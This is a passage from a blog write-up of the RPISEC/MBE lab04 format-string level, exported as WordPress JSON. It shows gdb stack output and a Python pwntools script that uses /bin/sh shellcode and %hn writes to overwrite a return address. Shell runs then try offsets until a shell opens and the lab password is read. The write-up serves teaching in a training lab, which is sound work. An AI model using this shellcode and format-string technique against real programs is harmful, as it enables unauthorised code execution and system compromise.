0xbffff674 --&gt; 0x8048cda (&quot;Starting back up: &quot;)\r\n0012| 0xbffff678 --&gt; 0xbffff8eb (&quot;test&quot;)\r\n0016| 0xbffff67c --&gt; 0xbffff7a4 --&gt; 0xbffff8d7 (&quot;\/levels\/lab04\/lab4A&quot;)\r\n0020| 0xbffff680 --&gt; 0x3\r\n0024| 0xbffff684 --&gt; 0x9 ('\\t')\r\n0028| 0xbffff688 --&gt; 0xffc0003f\r\n&#x5B;------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\n\r\nBreakpoint 2, 0x080489df in log_wrapper ()\r\ngdb-peda$\r\n<\/pre>\n<p>The top of the stack now points to the return address. Thus the address, where the return address is stored, is just the value of <code>esp<\/code>: <code>0xbffff66c<\/code>.<\/p>\n<p>Now we have got both addresses we were looking for:<br \/>\n&#8211;> buffer: <code>0xbffff56f<\/code><br \/>\n&#8211;> return address: <code>0xbffff66c<\/code><\/p>\n<h2>shellcode and %n specifier<\/h2>\n<p>For the shellcode we can just reuse the shellcode we used in the last labs. Because the buffer&#8217;s offset to the 4 byte alignment of the stack is 1 byte, I simply added <code>nops<\/code> (<code>0x90<\/code>) to the shellcode in order to align the following bytes.<\/p>\n<p>The final python-script constructs the format string we can pass to the program as the filename:<\/p>\n<pre class=\"brush: python; first-line: 0; title: ; notranslate\" title=\"\">\r\nlab4A@warzone:\/tmp$ cat exploit_lab4A_2.py\r\nimport sys\r\nfrom pwn import *\r\n\r\nshellcode = &quot;\\x90&quot;\\\r\n            &quot;\\x90\\x31\\xc0\\x50&quot;\\\r\n            &quot;\\x68\\x2f\\x2f\\x73&quot;\\\r\n            &quot;\\x68\\x68\\x2f\\x62&quot;\\\r\n            &quot;\\x69\\x6e\\x89\\xe3&quot;\\\r\n            &quot;\\x89\\xc1\\x89\\xc2&quot;\\\r\n            &quot;\\xb0\\x0b\\xcd\\x80&quot;\r\n            # len = 25\r\n\r\naddr_offset    = int(sys.argv&#x5B;1], 16)\r\naddr_buf      = 0xbffff56f - addr_offset\r\naddr_ret_addr = 0xbffff66c - addr_offset\r\n\r\nvalue_u2 = addr_buf &gt;&gt; 16\r\nvalue_l2 = addr_buf &amp; 0xffff\r\n\r\nexpl = shellcode\r\nexpl += p32(addr_ret_addr+2) # arg selector: $14 + 24\/4 = $20\r\nexpl += p32(addr_ret_addr)   # arg selector: $21\r\nexpl += &quot;%&quot; + str(value_u2 - 25 - 8) + &quot;x&quot;\r\nexpl += &quot;%20$hn&quot;\r\nexpl += &quot;%&quot; + str(value_l2 - value_u2) + &quot;x&quot;\r\nexpl += &quot;%21$hn&quot;\r\n\r\nsys.stdout.write(expl)\r\n<\/pre>\n<p>The script basically works like the script in the last levels. Only the values have been adjusted.<\/p>\n<p>Now we only need to try different offsets until we get a shell:<\/p>\n<pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\r\n...\r\nlab4A@warzone:\/tmp$ \/levels\/lab04\/lab4A $(python exploit_lab4A_2.py 0x60)\r\nERROR: Failed to open \u2592\u25921\u2592Ph\/\/shh\/bin\u2592\u2592\u2592\u00b0\r\n                                         \u0340\u2592\u2592\u2592\r\n\u2592\u2592\u2592%49118x%20$hn%13584x%21$hn\r\nlab4A@warzone:\/tmp$ \/levels\/lab04\/lab4A $(python exploit_lab4A_2.py 0x70)\r\nERROR: Failed to open \u2592\u25921\u2592Ph\/\/shh\/bin\u2592\u2592\u2592\u00b0\r\n                                         \u0340\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2592%49118x%20$hn%13568x%21$hn\r\nlab4A@warzone:\/tmp$ \/levels\/lab04\/lab4A $(python exploit_lab4A_2.py 0x80)\r\nERROR: Failed to open \u2592\u25921\u2592Ph\/\/shh\/bin\u2592\u2592\u2592\u00b0\r\n                                         \u0340\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2592%49118x%20$hn%13552x%21$hn\r\nlab4A@warzone:\/tmp$ \/levels\/lab04\/lab4A $(python exploit_lab4A_2.py 0x90)\r\nERROR: Failed to open (null)\r\nlab4A@warzone:\/tmp$ \/levels\/lab04\/lab4A $(python exploit_lab4A_2.py 0xa0)\r\n$ whoami\r\nlab4end\r\n$ cat \/home\/lab4end\/.pass\r\n1t_w4s_ju5t_4_w4rn1ng\r\n<\/pre>\n<p>Done! The final password is <code>1t_w4s_ju5t_4_w4rn1ng<\/code>.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>In the last lab, which writeup can be found here, we used publicly available shellcodes as well as shellcodes we had to write on our own, in order to exploit the provided binaries. In this writeup we proceed with the next lab, which focuses on the subject of Format Strings. As usual there are three &hellip; <\/p>\n<p class=\"link-more\"><a href=\"https:\/\/devel0pment.de\/?p=351\" class=\"more-link\">Continue reading<span class=\"screen-reader-text\"> &#8220;RPISEC\/MBE: writeup lab04 (Format Strings)&#8221;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26,7],"tags":[8,9,13,10,11,12,14],"class_list":["post-351","post","type-post","status-publish","format-standard","hentry","category-rpisec-mbe","category-writeup","tag-assembly","tag-binary","tag-elf","tag-pwn","tag-r2","tag-reversing","tag-x86"],"_links":{"self":[{"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/posts\/351"}],"collection":[{"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/devel0pment.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=351"}],"version-history":[{"count":6,"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/posts\/351\/revisions"}],"predecessor-version":[{"id":365,"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/posts\/351\/revisions\/365"}],"wp:attachment":[{"href":"https:\/\/devel0pment.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=351"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/devel0pment.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=351"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/devel0pment.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=351"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}